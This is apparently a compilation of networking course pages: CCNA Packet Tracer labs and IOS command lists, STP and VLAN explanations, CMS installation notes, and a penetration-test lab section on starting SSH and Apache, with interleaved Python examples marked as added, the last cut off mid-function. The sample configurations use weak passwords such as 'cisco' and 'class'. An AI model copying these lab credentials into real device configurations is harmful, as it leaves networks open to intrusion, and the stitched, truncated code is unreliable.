
Packet Tracer CCNA 3 Final


CCNA 3 Final PT Overview 

I created a Packet Tracer activity for a CCNA 3 class final. I hope this Packet Tracer final exercise will help prepare you for your CCNA 3: VLAN and Switching final, as well as any cumulative lab simulation involving switching and VLANs. The packet tracer involves VLANs, VTP, STP, Inter-VLAN routing, port security and wireless. The instructions for the lab final are included in the Packet Tracer file. You can download it here: CCNA3-dansFinal.zip

 

Cisco IOS Commands

You need to know the following commands for my Packet Tracer CCNA 3 final. The commands below use sample data only; you will need to fill in your own names and numbers based on the requirements of the lab.

switch# show running-config
switch# show vlan
switch# show vtp status
switch# show spanning-tree
switch# configure terminal
switch(config)# line console 0
switch(config-line)# password cisco
switch(config-line)# login
switch(config)# line vty 0 15
switch(config-line)# password cisco
switch(config-line)# login
switch(config)# enable secret class
switch(config)# vlan 5
switch(config-vlan)# name danscourses-vlan
switch(config)# vtp mode server
switch(config)# vtp mode client
switch(config)# vtp domain dansvtpdomain
switch(config)# vtp password danspass
switch(config)# spanning-tree vlan 1-1005 priority 4096
switch(config)# int vlan 99
switch(config-if)# ip address 192.168.99.2 255.255.255.0
switch(config)# ip default-gateway 192.168.99.1
switch(config)# int range fa0/1-3
switch(config-if-range)# switchport mode trunk
switch(config-if-range)# switchport trunk allowed vlan 1-50
switch(config-if-range)# switchport trunk native vlan 22
switch(config)# int fa0/10
switch(config-if)# switchport mode access
switch(config-if)# switchport access vlan 10
switch(config-if)# switchport port-security
switch(config-if)# switchport port-security maximum 3
switch(config-if)# switchport port-security violation shutdown
switch(config-if)# switchport port-security mac-address sticky
switch# copy run start
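As an added illustration (this is not code from the original post or from Cisco), here is a small Python model of what the port-security commands on fa0/10 above configure: the port learns up to "maximum" source MAC addresses (sticky means the learned addresses are written into the running-config), and a frame from any further unknown MAC triggers the configured violation action. The PortSecurity class, its method names and the MAC addresses are made up for the example; the behaviour it mirrors is the documented protect/restrict/shutdown logic.

```python
# Added example: a model of Cisco port-security on one access port. The
# PortSecurity class is hypothetical (not Cisco code) and follows the
# documented rules: learn up to `maximum` source MACs, then apply the
# configured violation action (protect, restrict or shutdown).


class PortSecurity:
    """Models `switchport port-security` on a single access port."""

    def __init__(self, maximum=1, violation="shutdown", sticky=True):
        if violation not in ("protect", "restrict", "shutdown"):
            raise ValueError("violation must be protect, restrict or shutdown")
        self.maximum = maximum
        self.violation = violation
        self.sticky = sticky          # sticky: learned MACs go into running-config
        self.secure_macs = []         # statically configured or learned MACs
        self.err_disabled = False     # set by the shutdown action
        self.violation_count = 0      # counted by restrict and shutdown

    def add_static(self, mac):
        """Equivalent of `switchport port-security mac-address <mac>`."""
        mac = mac.lower()
        if mac in self.secure_macs:
            return
        if len(self.secure_macs) >= self.maximum:
            raise ValueError("secure address table is full")
        self.secure_macs.append(mac)

    def receive(self, src_mac):
        """Process one ingress frame from src_mac and return the port's decision."""
        mac = src_mac.lower()
        if self.err_disabled:
            return "dropped (port err-disabled)"
        if mac in self.secure_macs:
            return "forwarded"
        if len(self.secure_macs) < self.maximum:
            # Dynamic learning; with sticky the address is also saved to the config.
            self.secure_macs.append(mac)
            return "forwarded (learned)"
        # Table full and this MAC is not secure: a violation.
        if self.violation == "protect":
            return "dropped"                        # silently discarded
        self.violation_count += 1
        if self.violation == "restrict":
            return "dropped (violation logged)"     # syslog/SNMP, port stays up
        self.err_disabled = True                    # shutdown: err-disable the port
        return "shutdown (err-disabled)"

    def recover(self):
        """What `shutdown` followed by `no shutdown` on the interface does."""
        self.err_disabled = False


# Constructed sample MAC addresses for the demonstration.
SAMPLE_MACS = ["0001.9600.0001", "0001.9600.0002",
               "0001.9600.0003", "0001.9600.0004"]


def demo(maximum=3, violation="shutdown"):
    """Replay four distinct hosts on a port configured like fa0/10 above."""
    port = PortSecurity(maximum=maximum, violation=violation, sticky=True)
    decisions = [port.receive(m) for m in SAMPLE_MACS]
    decisions.append(port.receive(SAMPLE_MACS[0]))  # known host after the violation
    return decisions, list(port.secure_macs), port.err_disabled


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

With maximum 3 and violation shutdown, the fourth host err-disables the port, and from then on even the first (legitimately learned) host is dropped until an administrator bounces the interface; that is the operational cost of the shutdown action the lab asks for, and why restrict is sometimes preferred on ports where an alert is enough.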

router# show running-config
router# show ip route
router# configure terminal
router(config)# line console 0
router(config-line)# password cisco
router(config-line)# login
router(config)# line vty 0 4
router(config-line)# password cisco
router(config-line)# login
router(config)# enable secret class 
router(config)# int fa0/0
router(config-if)# no shutdown
router(config)# int fa0/0.5
router(config-subif)# encapsulation dot1q 5
router(config-subif)# ip address 192.168.5.1 255.255.255.0
router(config)# int fa0/0.44
router(config-subif)# encapsulation dot1q 44 native
router(config-subif)# ip address 192.168.44.1 255.255.255.0
router# copy run start



STP


Overview

STP, or Spanning Tree Protocol, is a protocol used on switches that prevents Layer 2 switching loops and Layer 2 broadcast storms. It is essential in large networks designed with redundancy, such as backup switches and multiple paths across the network. Redundancy is a great thing for a network to have, but having more than one physical path or link across the network creates physical loops. When there are redundant links or paths for data to travel, the data can circulate around the network repeatedly in a Layer 2 switching loop. This has the potential to effectively shut down the network, because unlike packets at Layer 3, which have TTL values and a limited lifespan on the network, Layer 2 broadcasts have no TTL value and will therefore loop endlessly.

STP solves this problem by automatically blocking redundant or duplicate paths (ports) from switch to switch, thus closing the loops. If a path to a switch becomes unavailable, STP can reopen a closed port creating a new path. For this process to work, switches in the network communicate with one another, and share STP messages, called BPDUs, or Bridge Protocol Data Units.

The Root Bridge

The root bridge is the switch at the top of the Spanning Tree. The Spanning Tree Algorithm (STA) calculates the costs of all the paths in the network starting from the root bridge. The root bridge is chosen by an election in which the switch with the lowest bridge ID (BID) wins. The BID is determined by two factors:

1. The bridge priority number plus the VLAN ID. By default this is 32768 plus the default VLAN 1, which gives 32768+1=32769.
2. If that number is identical on all the switches, the switch with the lowest MAC address becomes the root bridge.

How to pick the root bridge?

It is a good idea not to leave the root bridge election to the mere chance of a switch having the lowest MAC address. Ideally the root bridge should be a robust switch at the center of the network, close to the resources users need to reach. Remember that the root bridge blocks ports in order to close loops, which determines the paths traffic will follow, and these layer 2 paths need to be as short as possible. For STP to function properly, the end-to-end layer 2 network diameter should be no more than 7 switches. If data has to traverse more than 7 switches, the STP timers will not function correctly and ports could start flapping between forwarding and blocking, which would create loops in the network.

Path Cost

The root bridge calculates which paths in the network are the best paths and which are redundant paths that need to be blocked. This is done by assigning each link a cost value based on the speed of the switchport. So, if the root bridge is connected to another switch through a gigabit port, that link is assigned a cost of 4, and if that switch is connected to a further switch through a Fast Ethernet port, that link is assigned a cost of 19. The entire path cost is 4 + 19 = 23.

The cost of the link is based on the speed of the port. Here is the list of port costs:

  • 10 Gig = 2
  • 1 Gig = 4
  • 100 Mb = 19
  • 10 Mb = 100
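To make the election and path-cost rules above concrete, here is an added Python example (not from the original post) that elects a root bridge from bridge priority, VLAN ID and MAC address, then computes every switch's root path cost from the port-cost table. The four-switch topology, its MAC addresses and the function names are constructed for the illustration; it also shows what lowering one switch's priority with spanning-tree vlan 1 priority 4096 does to the result.

```python
# Added example (not from the original post): root-bridge election and
# root path cost using the BID rule and the port-cost table above.
import heapq

# Port cost by link speed (Mbps) from the table above.
PORT_COST = {10_000: 2, 1_000: 4, 100: 19, 10: 100}

# Constructed sample topology: switch name -> (bridge priority, MAC address).
SWITCHES = {
    "S1": (32768, "0019.5600.00a1"),
    "S2": (32768, "0019.5600.00b2"),
    "S3": (32768, "0019.5600.00c3"),
    "S4": (32768, "0019.5600.00d4"),
}
# Links as (switch, switch, speed in Mbps).
LINKS = [("S1", "S2", 1000), ("S2", "S3", 100), ("S1", "S3", 100), ("S2", "S4", 100)]


def bridge_id(priority, vlan, mac):
    """Comparable BID: (priority + VLAN ID, MAC). The lowest tuple wins, so the
    MAC only matters when the priority numbers are identical."""
    if priority % 4096 or not 0 <= priority <= 61440:
        raise ValueError("priority must be a multiple of 4096 between 0 and 61440")
    return (priority + vlan, mac.lower())


def elect_root(switches, vlan=1):
    """Return the name of the switch with the lowest BID for this VLAN."""
    return min(switches, key=lambda n: bridge_id(switches[n][0], vlan, switches[n][1]))


def set_priority(switches, name, priority):
    """Copy of `switches` after `spanning-tree vlan 1 priority <num>` on one switch."""
    updated = dict(switches)
    updated[name] = (priority, switches[name][1])
    return updated


def root_path_costs(switches, links, vlan=1):
    """Elect the root, then find each switch's least-cost path to it (Dijkstra
    over per-link port costs). Returns (root, {switch: root path cost})."""
    root = elect_root(switches, vlan)
    adjacency = {name: [] for name in switches}
    for a, b, speed in links:
        adjacency[a].append((b, PORT_COST[speed]))
        adjacency[b].append((a, PORT_COST[speed]))
    cost = {root: 0}
    heap = [(0, root)]
    while heap:
        d, node = heapq.heappop(heap)
        if d > cost[node]:
            continue                      # stale heap entry
        for neighbour, link_cost in adjacency[node]:
            if d + link_cost < cost.get(neighbour, float("inf")):
                cost[neighbour] = d + link_cost
                heapq.heappush(heap, (d + link_cost, neighbour))
    return root, cost


if __name__ == "__main__":
    print(root_path_costs(SWITCHES, LINKS))                            # S1 wins on MAC
    print(root_path_costs(set_priority(SWITCHES, "S2", 4096), LINKS))  # S2 forced
```

With equal priorities S1 becomes root purely because its MAC is lowest, and S4 ends up with a root path cost of 4 + 19 = 23 (gigabit to S2, then Fast Ethernet). Forcing S2 to priority 4096 moves the root to the switch the designer chose and shortens S4's path to a single 19-cost hop.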

IOS Commands

switch#show spanning-tree
switch#debug spanning-tree events

Lowering the bridge priority number changes the outcome of the root bridge election, because the switch with the lowest bridge priority number is elected root bridge. The default bridge priority number is 32768. The first command below sets the bridge priority number manually. The following two commands automatically set the priority to a predefined number lower than the default.

switch(config)#spanning-tree vlan 1 priority <num> 
switch(config)#spanning-tree vlan 1 root primary
switch(config)#spanning-tree vlan 1 root secondary

The following commands allow you to manually change the cost of a port, which is normally based on port speed. This can change which ports, and therefore paths, that the root bridge will elect to block in order to close a loop.

switch(config)#interface fa0/1
switch(config-if)#spanning-tree cost <num>

The following command changes the port priority number, which can determine which of two ports competing on the same segment is put into a blocking state. To do this, lower the priority number below the default of 128.

switch(config-if)#spanning-tree port-priority <num>
or in Packet Tracer,
switch(config-if)#spanning-tree vlan <num> port-priority <num>
 

Video Tutorials

Click here to download the packet tracer files used in the video: STP1-begin-step4.zip , STP1-begin-step4-STP-OFF.zip

In part 1, I demonstrate how STP prevents Broadcast Storms in large networks with redundant switches

In part 2, I discuss the BID -bridge ID, and the STP root bridge election process

In part 3, I demonstrate how to force the STP root bridge election by changing the bridge priority number

 

Switch & VLAN Packet Tracer Challenge


Switch & VLAN Packet Tracer Challenge Overview

A Packet Tracer graded activity. It covers basic Cisco CCNA switch configuration, VLANs, the native VLAN, trunk ports, port security, and setting up secure remote administration with SSH. Great practice for the Cisco CCNA!

 

Download

The Packet Tracer file is created with Packet Tracer 5.3.3. The Packet Tracer Activity file will track your progress and give you a completion percentage and point total. You can download it here: BasicConfig-VLAN-Trunk-PortSec-SSH-challenge.zip


Activity Instructions

Configure the Network according to the Topology Diagram and Labels.
When you are finished, the PCs on the Student VLAN should be able to ping each other, and so should the PCs on the Faculty VLAN. The Admin PC should be able to SSH into S1 and S2 from the command prompt (e.g. PC>ssh -l admin 192.168.99.2).

PCs
1. IP address (see topology),
2. subnet mask (see topology),
3. default gateway address (first usable address in network)

Cisco 2960 Switches: S1 & S2
1. name: S1, S2
2. enable password, md5 encrypted: class
3. domain name: danscourses.com
4. message of the day banner: Unauthorized access is prohibited!
5. console password: cisco
6. vty 0 15 password: cisco
7. Security RSA Key size: 1024
8. SSH version 2
9. vty: ssh only
10. VLAN 10: student
11. VLAN 20: faculty
12. VLAN 99: Mgt
13. Interface VLAN 99: S1-IP address 192.168.99.2, S2-IP address 192.168.99.3
14. Native VLAN 99
15. fa0/1 Trunk
16. fa0/2-0/13 access VLAN 10
17. fa0/14-0/24 access VLAN 20
18. Gi1/1 access VLAN 99
19. Encrypt all passwords
20. Save running-config to startup-config

Cisco 2960 Switch: S1 Only
1. Gi1/1 Switchport Port-Security, sticky, maximum 1 mac address, violation shutdown


 

VLANs and Trunks


Overview

VLANs - A switch is used to set up a local area network (LAN). VLAN stands for virtual local area network. By default, all of the ports on a Cisco switch are part of the same default VLAN (VLAN1) and therefore the same network. A VLAN is a network, and a network is a broadcast domain. If you configure various switch ports for separate VLANs, the devices on those ports belong to separate VLANs and are therefore segmented into separate broadcast domains and networks. This is effectively like dividing one switch into multiple switches. It is cost effective because, instead of having a separate switch for each network, you can configure one switch with multiple VLANs and assign each port to whatever VLAN its host needs to belong to.

VLAN Types

Data VLAN - A data VLAN carries only user data, not management, control or voice data.

Default VLAN - On a Cisco switch the default VLAN is VLAN1. This means that by default, when a Cisco switch boots up for the first time all the ports are automatically assigned to the default VLAN, VLAN1. You cannot delete or rename VLAN1 but you can assign the ports on the switch to a different VLAN. It is considered best practice to make all of the user ports on the switch belong to a different default VLAN, one other than VLAN1. In this way, control data such as CDP and STP (spanning tree protocol) which are by default carried on VLAN1 would be on a separate VLAN from user data. 

Native VLAN - The native VLAN, if not explicitly configured, defaults to the default VLAN (VLAN1). The native VLAN is configured on an 802.1Q trunk port. 802.1Q trunks carry traffic from multiple VLANs by tagging it with VLAN identifiers (tagged traffic) that identify which VLAN each frame belongs to; they can also carry non-VLAN traffic from legacy or non-802.1Q-compliant switches (untagged traffic). The switch places untagged traffic on the native VLAN using the port VLAN identifier (PVID). Native VLAN traffic is not tagged by the switch. It is a best practice to configure the native VLAN to be something other than VLAN1 and to configure it on both ends of the trunk.

Management VLAN - The management VLAN is any VLAN you configure to allow a host to connect to the switch and remotely manage it. The management VLAN will need to be configured with an IP address and subnet mask to allow a manager to connect to the switch by either a web interface (HTTP), Telnet, SSH, or SNMP.

VLAN ID Ranges

Normal Range

  • 1 to 1005
  • VLAN1 (default), created by default, cannot be deleted
  • VLAN1002-1005 (Token Ring and FDDI default), created by default and cannot be deleted  
  • Stored in the VLAN.dat file in Flash memory

Extended Range

  • 1006 - 4094
  • Extended VLAN range used by ISPs
  • Stored in Running-Config

Trunks - If you have a switch that has ports variously configured on four different VLANs, then that switch has four different networks on it. When you connect that switch to a router or to another switch you will need four ethernet connections or links, one for each VLAN/network. A more cost effective way to connect a switch with multiple VLANs to a router or switch would be to configure a Trunk. A Trunk is a special kind of port configuration which allows multiple VLANs to travel over one link. This way multiple networks can travel over one trunk instead of wasting valuable ports to connect from switch to switch or switch to router. A Cisco trunk by default uses the 802.1Q protocol. The 802.1Q protocol places and strips VLAN tags on packets to identify which VLAN they belong to.
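The tagging described in the Native VLAN and Trunks paragraphs is easy to see in bytes. The following Python example is added here and is not code from the original post: it builds Ethernet frames with and without an 802.1Q tag, decodes them the way a trunk port does (an untagged frame lands on the native VLAN via the PVID, which is the reason for the native-VLAN advice above), and applies the allowed-VLAN and native-VLAN egress rules of a trunk. The function names, MAC addresses and payload bytes are constructed for the illustration.

```python
# Added example (not from the original post): build and decode 802.1Q tagged
# frames the way a trunk port does. Function names and the MAC addresses are
# made up for the illustration.
import struct

TPID_8021Q = 0x8100   # EtherType value that announces an 802.1Q tag


def mac_bytes(mac):
    """'0019.5600.00a1' or '00:19:56:00:00:a1' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace(".", "").replace("-", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(dst, src, ethertype, payload, vlan=None, pcp=0):
    """Return an Ethernet frame; when vlan is given, insert an 802.1Q tag after
    the source MAC (TPID 0x8100 followed by the 16-bit TCI: PCP, DEI, VID)."""
    header = mac_bytes(dst) + mac_bytes(src)
    if vlan is not None:
        if not 1 <= vlan <= 4094:           # 0 and 4095 are reserved
            raise ValueError("VLAN ID must be between 1 and 4094")
        header += struct.pack("!HH", TPID_8021Q, (pcp << 13) | vlan)
    return header + struct.pack("!H", ethertype) + payload


def parse_frame(frame, native_vlan=1):
    """Decode a frame as a trunk port does: a tagged frame belongs to the VLAN in
    its tag, an untagged frame is placed on the port's native VLAN (the PVID)."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src = mac_str(frame[0:6]), mac_str(frame[6:12])
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype == TPID_8021Q:
        if len(frame) < 18:
            raise ValueError("truncated 802.1Q tag")
        tci, inner_type = struct.unpack("!HH", frame[14:18])
        return {"dst": dst, "src": src, "tagged": True, "vlan": tci & 0x0FFF,
                "pcp": tci >> 13, "ethertype": inner_type, "payload": frame[18:]}
    return {"dst": dst, "src": src, "tagged": False, "vlan": native_vlan,
            "pcp": 0, "ethertype": ethertype, "payload": frame[14:]}


def trunk_egress(vlan, allowed, native_vlan):
    """What a trunk port does with a frame on `vlan`: drop it if the VLAN is not
    in the allowed list, send it untagged on the native VLAN, otherwise tag it."""
    if vlan not in allowed:
        return "dropped"
    return "untagged" if vlan == native_vlan else "tagged"


if __name__ == "__main__":
    tagged = build_frame("0019.5600.00a1", "0019.5600.00b2", 0x0800, b"\x45\x00", vlan=10)
    print(parse_frame(tagged, native_vlan=99))
    plain = build_frame("0019.5600.00a1", "0019.5600.00b2", 0x0806, b"\x00\x01")
    print(parse_frame(plain, native_vlan=99))
```

Two things to notice when running it: the tag adds exactly four bytes between the source MAC and the real EtherType, and an untagged frame carries no VLAN information of its own, so the VLAN it ends up on is entirely a property of the receiving port's native VLAN setting. That is why the native VLAN has to match on both ends of a trunk.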

CLI Commands

switch#show vlan
switch#show interfaces trunk

switch(config)#vlan <vlan number>
switch(config-vlan)#name <vlan name>

switch(config)#interface fa0/x
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan <1-4094>

switch(config-if)#switchport mode trunk
switch(config-if)#switchport trunk allowed vlan <1-1005>
switch(config-if)#switchport trunk native vlan <1-1005>


Configuring VLANs and Trunks

In the video tutorial below I demonstrate how to configure VLANs and Trunks on a Cisco switch using Packet Tracer.


 

 


 

Subnetting a Subnet with VLSM


VLSM Overview

Variable Length Subnet Masks (VLSM) are used to create subnetworks of varying sizes. This works as long as the address spaces of the subnets do not overlap. VLSM lets network designers avoid wasting public IPv4 addresses by creating networks of the sizes they need. Early dynamic routing protocols were not designed to work with VLSM because they were built around classful IPv4 addressing. Modern routing protocols are designed to work with VLSM and classless inter-domain routing (CIDR). For the Cisco CCNA exam, you will need to know how to create subnets of varying sizes that do not have overlapping address spaces.
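The no-overlap rule above can be checked mechanically. The following Python example is added here (it is not from the original post) and carves one block into subnets of the requested sizes using the standard library's ipaddress module: requirements are allocated largest first, so every subnet starts on a boundary that is a multiple of its own size and none can overlap, and a final check confirms that. The block 192.168.10.0/24 and the four host-count requirements are constructed for the illustration.

```python
# Added example (not from the original post): carve one address block into
# non-overlapping subnets of the sizes requested, using the standard library.
import ipaddress

# Constructed requirements: (network name, hosts that need addresses).
REQUIREMENTS = [("WAN link", 2), ("Sales LAN", 100), ("Engineering LAN", 50), ("Servers", 20)]


def prefix_for_hosts(hosts):
    """Longest prefix (smallest subnet) that still leaves `hosts` usable
    addresses after the network and broadcast addresses are set aside."""
    if hosts < 1:
        raise ValueError("a subnet must serve at least one host")
    size = 4                              # /30 is the smallest useful subnet
    while size - 2 < hosts:
        size *= 2
    return 32 - (size.bit_length() - 1)


def vlsm(block, requirements):
    """Allocate one subnet per (name, hosts) pair from `block`.
    Subnets are handed out largest first, so each one starts on a boundary
    that is a multiple of its own size and no two can overlap.
    Returns [(name, hosts, IPv4Network), ...]."""
    base = ipaddress.ip_network(block)
    cursor = int(base.network_address)    # next free address
    limit = int(base.broadcast_address) + 1
    plan = []
    for name, hosts in sorted(requirements, key=lambda r: r[1], reverse=True):
        prefix = prefix_for_hosts(hosts)
        size = 1 << (32 - prefix)
        if cursor + size > limit:
            raise ValueError(f"{block} cannot fit {name} ({hosts} hosts, /{prefix})")
        # strict=True (the default) raises if the network address were misaligned
        net = ipaddress.ip_network(f"{ipaddress.ip_address(cursor)}/{prefix}")
        plan.append((name, hosts, net))
        cursor += size
    return plan


def has_overlap(plan):
    """True if any two allocated subnets share addresses (should never happen)."""
    nets = [net for _, _, net in plan]
    return any(a.overlaps(b) for i, a in enumerate(nets) for b in nets[i + 1:])


if __name__ == "__main__":
    for name, hosts, net in vlsm("192.168.10.0/24", REQUIREMENTS):
        print(f"{name:16} {hosts:4} hosts -> {net}  ({net.num_addresses - 2} usable)")
```

For the sample requirements the plan is 192.168.10.0/25 for 100 hosts, 192.168.10.128/26 for 50, 192.168.10.192/27 for 20 and 192.168.10.224/30 for the point-to-point link, which is the same largest-first procedure used to solve the exam questions in the videos below. Asking for more hosts than the block holds raises an error instead of silently overlapping.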

In the video tutorials below, I demonstrate how to solve a typical variable length subnet mask multiple choice question of the type you might see on an exam.


Video Tutorials - VLSM






Packet Tracer 6 Activity - Basic IPv4 Network


Overview

This virtual networking activity involves setting up a basic IPv4 network by connecting two Cisco 1941 routers to two Cisco Catalyst 2960 switches to two PCs. The goal is to variously configure the PCs, switches, and routers with the following information:

• Basic network device security, by configuring access port passwords, banner message of the day and encryption on the routers and switches (see the network diagram in Packet Tracer),
• Interface IP address, subnet mask, and gateway addresses (see the network diagram in Packet Tracer),
• A static default route/gateway of last resort for the routers,
• Follow the instructions in the network diagram for additional required configurations

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. In the end, you should be able to ping from PCA to PCB.


Download

BasicIPv4NetworkConfiguration.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - Only Read Below if you are stuck

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#banner motd "No unauthorized access allowed!"
R1(config)#enable secret class
R1(config)#service password-encryption
R1(config)#line console 0
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#line vty 0 4
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#exit
R1(config)#interface g0/0
R1(config-if)#ip address 192.168.5.1 255.255.255.0
R1(config-if)#description toR2
R1(config-if)#no shut
R1(config)#interface g0/1
R1(config-if)#ip address 192.168.0.1 255.255.255.0
R1(config-if)#description toLAN
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ip route 0.0.0.0 0.0.0.0 192.168.5.2
R1#copy running-config startup-config
R1#show running-config
R1#show ip route
R1#show ip int brief

switch>enable
switch#configure terminal
switch(config)#hostname S1
S1(config)#banner motd "No unauthorized access allowed!"
S1(config)#enable secret class
S1(config)#service password-encryption
S1(config)#line console 0
S1(config-line)#password cisco
S1(config-line)#login
S1(config-line)#line vty 0 14
S1(config-line)#password cisco
S1(config-line)#login
S1(config-line)#exit
S1(config)#interface vlan 1
S1(config-if)#ip address 192.168.0.2 255.255.255.0
S1(config-if)#no shut
S1(config-if)#exit
S1(config)#ip default-gateway 192.168.0.1
S1(config)#exit
S1#copy running-config startup-config
S1#show running-config

 



Packet Tracer 6 Activity - Basic IPv6 Network


Overview

This Packet Tracer 6.0.1 networking activity involves setting up a basic IPv6 network by interconnecting two Cisco 1941 routers, two Cisco Catalyst 2960 switches, and two PCs. All of the devices in the network will need to be configured with IPv6 addressing in order to communicate. The goal is to configure the routers and PCs with the following information:

• On the routers configure basic security with hostnames, console and vty passwords, banner message of the day, and enable password encryption (see the network diagram in Packet Tracer),
• On the routers configure link-local and global unicast IPv6 addresses with network prefix lengths (see the network diagram),
• On the routers configure static IPv6 default routes (see the network diagram),
• On the PCs configure static IPv6 addresses with network prefix lengths, and a gateway address (see the network diagram),
• Follow the instructions in the network diagram for additional required configurations

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PCB from PCA).

 


Download

BasicIPv6NetworkConfiguration.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - Only Read Below if you are stuck

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#banner motd "No unauthorized access allowed!"
R1(config)#enable secret class
R1(config)#service password-encryption
R1(config)#line console 0
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#line vty 0 4
R1(config-line)#password cisco
R1(config-line)#login
R1(config-line)#exit
R1(config)#ipv6 unicast-routing
R1(config)#interface g0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:ACAD:2::1/64
R1(config-if)#description toR2
R1(config-if)#no shut
R1(config)#interface g0/1
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:ACAD:1::1/64
R1(config-if)#description toLAN
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ipv6 route ::/0 2001:DB8:ACAD:2::2
R1#copy running-config startup-config
R1#show running-config
R1#show ipv6 route
R1#show ipv6 int brief

 



 

Installing Joomla and WordPress


Overview

Now we need to get full installations of Joomla and WordPress, which you can download from their websites. If you are running Windows you will want to download the zipped versions of Joomla and WordPress. Once you have downloaded the zipped packages, you will need to extract or unzip them by right-clicking on them and selecting 'Extract all'. Once extracted, you will see that both the Joomla and WordPress frameworks consist of files and folders within one central folder. The file types include php, css, html, javascript, xml, jpg, and png files, etc. A Joomla or WordPress website starts with that central 'folder' and all of the folders and files contained therein.

A Joomla or WordPress website is essentially a folder with all of the Joomla or WordPress files and folders inside; connect it to a MySQL database and you have a Joomla or WordPress website. When you download Joomla or WordPress, you are downloading the whole thing (minus the database) in one compressed folder, which you then have to decompress (unzip). Once the folder is unzipped, you can rename it to anything you like to differentiate it from other sites (folders) on your webserver. Each 'website' is another instance of this complete folder or directory. In computer lingo, the word "directory" is often substituted for, or preferred over, the word folder. To repeat the concept: if you decide to host multiple Joomla and WordPress websites on your server, each website will need its own uniquely named directory containing all of the files and directories within, as well as a MySQL database to go with it.

Materials

You will need to go to the Joomla website and download two versions of Joomla. I recommend downloading the zip versions of Joomla 1.5.x, a classic older version, and Joomla 2.5.x (the x signifies the latest sub-version).

You will also need to visit the WordPress website and download the latest zip version of WordPress; currently it is WordPress 3.4.2.

 


Video Tutorials

This series of video tutorials will walk you through installing Joomla 1.5, Joomla 2.5, and WordPress 3.4.2. The goal is to set up three development websites on your local computer in order to begin learning how to use Joomla and WordPress.

Preparing to install three websites in WAMPserver


Creating the databases 

 

Install Joomla 1.5.x

 

Install Joomla 2.5.x

 

Install WordPress 3.4.2 


 


Create a User Login Module in Joomla 1.5


Video Tutorials

In this video tutorial, I create a front-end user login module in Joomla 1.5

 

DHCP and NAT


Overview

In the tutorials below, I configure DHCP and NAT and demonstrate how they function using Packet Tracer.

Video Tutorials

Configure the Cisco router to function as a DHCP server

 


 

Configure the Cisco router to relay DHCP requests to the DHCP server using an ip helper-address

Configure the router as a DHCP relay agent - Take 2

Network Address Translation (NAT) - Part 1

 


 

Network Address Translation (NAT) - Part2

Network Address Translation (NAT) - Part3

 


 

Network Address Translation (NAT) - Part4


Run Services (SSH, FTPD, HTTPD)


Introduction

If we are going to penetrate victim computers (in the test lab) and establish communication to and from those clients so that we can execute commands and transfer files, we will need some network services like SSH and FTP.

SSH

SSH, or Secure Shell, allows you to open a secure terminal connection to a remote host, or simply to log in to a remote computer in order to execute commands. This is done through a client-server model in which an SSH client connects to an SSH server. This type of connection is typically used to securely exchange encrypted data with a remote host; the data is usually commands, but it can also be files using SFTP and SCP, which run over the SSH protocol. SSH was developed to replace insecure remote connection protocols like rlogin, telnet and rsh. SSH typically runs on port 22. SSH should be installed by default in BackTrack.

Manual pages on SSH and the SSHDaemon
   #man ssh
   #man sshd

Generate the secure keys for the host service
    #sshd-generate
   or
    #ssh-keygen

Start the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh start

Check to see if SSH is listening on Port 22
   #netstat -antp

Since you are now running an SSH server, you could download PuTTY to your Windows client and SSH into your BackTrack machine. Try this, was it successful? If not, where might the block be? Are you VPN'd? Are there any firewalls on the client or on an intermediary network device?

Stop the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh stop

If you want instructions on how to install SSHD in Ubuntu go here


HTTPD (Apache)

The Apache webserver is the most widely used webserver on the internet. From a network penetration perspective, a webserver could be used as an exploitation tool serving up malicious files and scripts that execute against a victim's browser and computer. It could also be used as a way of transferring files to a victim machine once access has already been obtained. Webservers, by their very public nature, are a great way for a hacker to gather information or reconnaissance about a company or target. The Apache webserver usually runs on port 80.

Start the Apache2 server using the scripts in the init.d directory
  #/etc/init.d/apache2 start

Verify if Apache is listening on Port 80
   #netstat -antp
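Both the SSH check (port 22) and the Apache check (port 80) above come down to reading netstat -antp by eye. The following Python example is added here (it is not from the original post) and turns that into a scripted check: it parses the tcp/tcp6 rows, reports which ports are in LISTEN state and which program owns them, and separates services bound to every interface (0.0.0.0 or ::) from those reachable only on localhost, which is the distinction that matters when you later ask whether a firewall or a bind address is what blocks a remote client. The sample output and its PIDs are constructed for the example rather than captured from a real host; the function names are mine.

```python
# Added example (not from the original post): a parser for the `netstat -antp`
# output the checks above rely on, so "is port 22/80/21 listening?" becomes a
# scripted test instead of a visual one. The sample output is constructed, not
# captured from a real host.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      987/cupsd
tcp        0      0 192.168.2.10:22         192.168.2.5:51234       ESTABLISHED 1300/sshd: root
tcp6       0      0 :::80                   :::*                    LISTEN      2001/apache2
"""


def parse_netstat(text):
    """Return one dict per tcp/tcp6 row; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split(None, 6)         # keep "PID/Program name" whole
        if len(fields) < 7 or not fields[0].startswith("tcp"):
            continue
        addr, port = fields[3].rsplit(":", 1)
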